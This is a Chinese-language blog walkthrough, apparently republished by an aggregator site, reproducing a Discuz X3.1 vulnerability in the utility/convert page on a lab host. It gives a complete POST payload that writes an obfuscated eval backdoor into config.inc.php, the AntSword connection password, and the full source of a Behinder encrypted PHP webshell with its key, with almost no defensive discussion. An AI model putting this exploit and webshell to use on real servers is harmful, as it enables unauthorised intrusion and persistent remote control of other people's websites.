漏洞复现Discuz-x3.1 插件漏洞

Posted 独角授

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漏洞复现Discuz-x3.1 插件漏洞相关的知识,希望对你有一定的参考价值。

Discuz-x3.1 插件漏洞

一、漏洞背景

作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 开发组具有丰富的 web应用程序设计经验,尤其在论坛产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术。使得 Discuz! 无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。

二、信息收集

本地IIS搭建Discuz-x3.1,发现不能直接访问

image-20210526122832856

进行漏洞信息搜集

利用百度、Google等搜索引擎搜集漏洞信息。这些漏洞信息在一些漏洞平台比如CSDN、补天等都可能有,很快便找到了可利用的信息:

192.168.64.132:8251/utility/convert

三、漏洞利用

直接访问http://192.168.64.132:8251/utility/convert/index.php

image-20210526124140207

发现漏洞所在页

用bp抓包,改变请求方式为POST,上传数据

a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

最后一句上传的数据为重中之重!!!

image-20210526125129013

访问该地址

http://192.168.64.132:8251/utility/convert/data/config.inc.php

image-20210526125449693

最后用蚁剑连接,连接密码为c

image-20210526133948800

image-20210526133911072

蚁剑连接成功,创建文件config.php,写入冰蝎码,用冰蝎连接拿shell

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; 
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15];}
}
else
{$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);

?>

image-20210526210932078

image-20210526210942816

冰蝎连接成功!!!

以上是关于漏洞复现Discuz-x3.1 插件漏洞的主要内容,如果未能解决你的问题,请参考以下文章

漏洞复现WordPress插件Quizlord 2.0 XSS漏洞复现与分析

CVE-2015-1635(MS15-034 )远程代码执行漏洞复现

CVE-2019-5475:Nexus2 yum插件RCE漏洞复现

Struts2远程代码执行漏洞S2-052 复现&防御方案

Redis未授权漏洞复现及利用(window,linux)

Struts2-052 漏洞复现